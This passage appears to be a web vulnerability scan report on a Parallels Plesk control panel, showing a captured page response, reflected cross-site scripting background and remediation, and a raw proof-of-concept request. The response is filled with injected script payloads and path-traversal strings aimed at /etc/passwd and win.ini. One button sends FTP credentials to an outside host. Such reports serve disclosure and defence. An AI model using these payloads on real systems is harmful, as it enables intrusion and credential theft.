XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 
XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"fdf080d9bd966e1de55578fb","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1fdf080d9b2b0696f832ad89","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 
XSS","comment":"fdf080d92d642275e0dcc88a","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1fdf080d9f5a4b605e4d1d3e","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 
XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 
XSS..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/winnt\/win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd%00XSS Link to store.parallels.com with 
XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini%00XSS Link to store.parallels.com with 
XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini%00XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSSfdf080d955073164a20925b1","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/xss.cx?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"XSS.CX","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b51d93c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"}] }, {
componentType: 'Jsw.Panel',
id: 'advancedPanel',
title: 'Show Advanced Operations',
hideContentTitle: 'Hide Advanced Operations',
cls: 'tools-list-box operations-list-box',
hidden: true,
items: [{
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
emptyItemClass: 'tools-item-empty',
items: [{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/protected-dirs_16.gif","title":"Password-protected Directories","comment":"Restrict access to selected areas of your websites with password protection.","href":"\/web\/proxy\/type\/protected-dirs"},null,null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/maintenance-mode_16.gif","title":"Website Maintenance Mode","comment":"Switch a site off for maintenance and let the site visitors know that this is done on purpose and the site will be up soon.","href":"\/web\/proxy\/type\/maintenance-mode"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/copy_16.gif","title":"Website Copying","comment":"Copy website files to another site or external FTP storage.","href":"\/web\/proxy\/type\/copy"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/site-production_16.gif","title":"Learn How to Move a Site from Development to Production","comment":"View instructions on how to put an updated website into production.","href":"\/web\/site-production"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/how-to-clone-site_16.gif","title":"Learn How to Clone a Site to Development Environment","comment":"View instructions on how to clone the whole website (files, databases and applications).","href":"\/web\/how-to-clone-site"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/logs_16.gif","title":"Logs","comment":"View logs and configure recycling of log files.","href":"\/web\/proxy\/type\/logs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/hotlink-prot_16.gif","title":"Hotlink Protection","comment":"Protect content of your websites from hotlinking.","href":"\/web\/proxy\/type\/hotlink-protection"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-dirs_16.gif","title":"Virtual 
Directories","comment":"Create and manage virtual directories for your websites.","href":"\/web\/proxy\/type\/web-dirs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/band-limit_16.gif","title":"Bandwidth Limiting","comment":"Adjust the limit on bandwidth usage and connections to your websites.","href":"\/web\/proxy\/type\/bandwidth-limit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/iis-app-pool_16.gif","title":"Dedicated IIS Application Pool for Your Websites","comment":"Set up a dedicated IIS application pool for serving websites associated with the currently selected subscription.","href":"\/web\/iis-app-pool"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/dom-aliases_16.gif","title":"Domain Aliases","comment":"View and manage alternative domain names for your websites.","href":"\/web\/proxy\/type\/domain-aliases"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/shared-ssl_16.gif","title":"Master SSL Domain","comment":"Use an SSL certificate associated with one of your websites for securing connections to other sites with the shared SSL service.","href":"\/web\/master-shared-ssl"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-users_16.gif","title":"Web Users","comment":"Set up accounts for users who can host personal web pages on your websites.","href":"\/web\/web-users"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/odbc-dc_16.gif","title":"ODBC Data Sources","comment":"Set up ODBC data sources.","href":"\/web\/proxy\/type\/odbc-data-sources"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/asp-net-settings_16.gif","title":"ASP.NET Settings","comment":"Configure the settings of ASP.NET framework.","href":"\/web\/proxy\/type\/asp-net-settings"},null] }]
}]
});


new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',

items: [
new Jsw.Hint({
hint: 'A website is a collection of related web pages, images, videos, and other files that are accessible by a common domain name. Here is a list of your websites, from which you can change website hosting settings, open a website directory in file manager, view statistics on website visits, install an SSL certificate, view web server logs, and change DNS zone settings.' }),

new Jsw.List({
id: 'sites-list',
searchable: false,
disabledSelectHint: 'The main domain name cannot be removed.',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":1,"totalItemCount":1,"firstItemNumber":1,"lastItemNumber":1},"state":{"sortField":"displayName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":[],"forceShowSearch":false},"data":[{"mainDomain":true,"id":"d:1","domainId":1,"sortKey":"vulnerable.host.fqdn_","displayName":"nosedivesailing.com","statusInactive":null,"hostingType":"vrt_hst","webrootDir":"httpdocs","forwardingUrl":null,"changeHostingUrl":"\/web\/change-hosting\/id\/1","setupUrl":"\/web\/settings\/id\/1","filemanagerUrl":"\/web\/file-manager\/dir\/%2Fhttpdocs","sitebuilderUrl":"","sitebuilderLegacyUrl":null,"statisticsUrl":"window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false;","certificatesUrl":"\/web\/proxy\/type\/ssl-certificates\/id\/1","logsUrl":"\/web\/proxy\/type\/logs\/id\/1","dnsUrl":"\/web\/proxy\/type\/dns\/id\/1","previewUrl":"window.open(\"\/sitepreview\/http\/vulnerable.host.fqdn\/?randomHash=be05c143230ef0b43bc9cb9064228976\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; ","maintenanceMode":false,"maintenanceModeUrl":"\/web\/maintenance-mode\/id\/1"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items 
first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/web/list-data',

isDisabledItem: function(item) {
return item.mainDomain;
},

columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Domain',
sortable: true,
dataIndex: 'displayName',
renderer: function(item) {
var inactivitySign = item.statusInactive
? '<b>inactive</b>'
: '';

var link = '<a href="' + Jsw.baseUrl + item.setupUrl + '">'
+ item.displayName.escapeHTML() + '</a>';


if (item.mainDomain) {
link = '<strong class="primary-domain">' + link + '</strong>';
}

if (item.statusInactive) {
link = link
+ '<div class="hint-attention">'
+ 'Inactive' + '</div>';
}

if (item.maintenanceMode) {
link = link
+ '<div class="hint-attention">'
+ 'Switched off for maintenance.' + ' <a href="' + Jsw.baseUrl + item.maintenanceModeUrl + '">'
+ 'Change' + '</a>'
+ '</div>';
}

if (item.hostingType == 'subdomain') {
link = '<div class="level1">' + link + '</div>';
}

return link;
}
},
{
header: 'Hosting',
sortable: false,
renderer: function(item) {
var message = '';

if (item.hostingType == 'vrt_hst' || item.hostingType == 'subdomain') {

var webrootDir = item.webrootDir;

if (item.filemanagerUrl) {
webrootDir = '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ item.webrootDir
+ '</a>';
}

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/website_16.gif"/>'
+ ' '
+ 'Website at' + ' '
+ webrootDir;

} else if (item.hostingType == 'none') {
message = '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" />'
+ '<em class="hint">' + 'No web hosting' + '</em>'
+ ' '
+ '<a href="' + Jsw.baseUrl + item.changeHostingUrl + '">['
+ 'add' + ']</a>';

} else if (item.hostingType == 'frm_fwd' || item.hostingType == 'std_fwd') {

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/forward-to-dom_16.gif"/>'
+ ' '
+ 'Forward to' + ' '
+ '<a href="' + item.forwardingUrl + '">'
+ item.forwardingUrl
+ '</a>';
}

return message;
}
},
{
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {

var content = '';

content += !item.previewUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Preview the website in your browser. Note that some scripts and Flash animation used on the site might not work in the preview mode.' + '</span>'
+ '<a href="#" onclick=\'' + item.previewUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/preview_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.filemanagerUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Go to website folder for managing files of the website.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/website-folder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType != 'subdomain') {
content += !item.sitebuilderUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.sitebuilderUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';
}
content += !item.sitebuilderLegacyUrl
? ''
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder 4.5 (legacy).' + '</span>'
+ '<a href="' + item.sitebuilderLegacyUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType == 'subdomain' && !item.sitebuilderLegacyUrl) {
content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> ';
}

content += !item.statisticsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View website visits statistics.' + '</span>'
+ '<a href="#" onclick=\'' + item.statisticsUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/stats_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.certificatesUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Secure the site with an SSL certificate.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.certificatesUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/ssl-cert_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.logsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View logs.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.logsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/logs_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.dnsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Change DNS zone settings.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.dnsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/dns_16.gif"/>'
+ '</a>'
+ '</span> ';

return content;
}
}
],

operations: [
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddDomain',
cls: 's-btn sb-new-domain',
title: 'Add New Domain',
description: 'Host a new website on this server, set up web forwarding to another website, or set up a domain DNS zone if you want to have only e-mail addresses under a domain name.',
handler: function() {
Jsw.redirect('/web/add-domain');
}
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddSubDomain',
cls: 's-btn sb-new-subdomain',
title: 'Add New Subdomain',
description: 'Create a site addressed by a third-level domain name, like shop.example.com.',
handler: function() {
Jsw.redirect('/web/add-subdomain');
}
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRegisterDomain',
cls: 's-btn sb-register-domain',
title: 'Register Domain Names',
description: 'Register domain names with a domain name registrar recommended by your provider.',
href: '/web/mpc-register-domain',
target: '_blank'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonManageDomains',
cls: 's-btn sb-manage-domains',
title: 'Manage Domain Names',
description: 'Manage domain names that you registered with your provider: Update registration information, specify name servers, and renew domain registration.',
href: '/web/mpc-manage-domains',
target: '_blank'
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveSite',
title: 'Remove',
description: 'Remove the selected sites and all their web content, including apps, and mail data.',
cls: 's-btn sb-remove-selected',
handler: function() {
Jsw.getComponent('sites-list').execGroupOperation({
url: '/web/delete/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Confirm that you want to remove the selected sites.' }
});
}
}],

onRedraw: function() {
$('sites-list').select('input[name="listCheckbox[]"]').each(function(checkbox) {
checkbox.observe('click', function() {
// if domain selected
if ('undefined' == typeof checkbox.up('tr').down('div.level1')) {
var nextRows = checkbox.up('tr').nextSiblings();
nextRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
throw $break;
}
rowElement.down('input[name="listCheckbox[]"]').checked = checkbox.checked;
if (checkbox.checked) {
rowElement.addClassName('selected');
} else {
rowElement.removeClassName('selected');
}
});
} else {
var prevRows = checkbox.up('tr').previousSiblings();
prevRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
if (!checkbox.checked) {
var parentCheckbox = rowElement.down('input[name="listCheckbox[]"]');
if (parentCheckbox) {
parentCheckbox.checked = false;
rowElement.removeClassName('selected');
}
}
throw $break;
}
});
}
});
});
}
})
]
});

});
//]]>
</script>

</div> <!-- /main -->

<div id="secondary">
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

2. Cross-site scripting (reflected)
There are 10 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: validating input as strictly as possible on arrival, given the kind of content it is expected to contain, and rejecting (not sanitising) anything that fails; and HTML-encoding user input at every point where it is copied into application responses, so that metacharacters such as <, >, ", ' and = are replaced with their HTML entity equivalents.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/ [wizard parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@new/properties/

Issue detail

The value of the wizard request parameter is copied into the HTML document as plain text between tags. The payload f20a2<script>alert(1)</script>641f862f323 was submitted in the wizard parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /plesk/client@2/custom-buttons/custom-button@new/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/custom-button@new/properties/
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
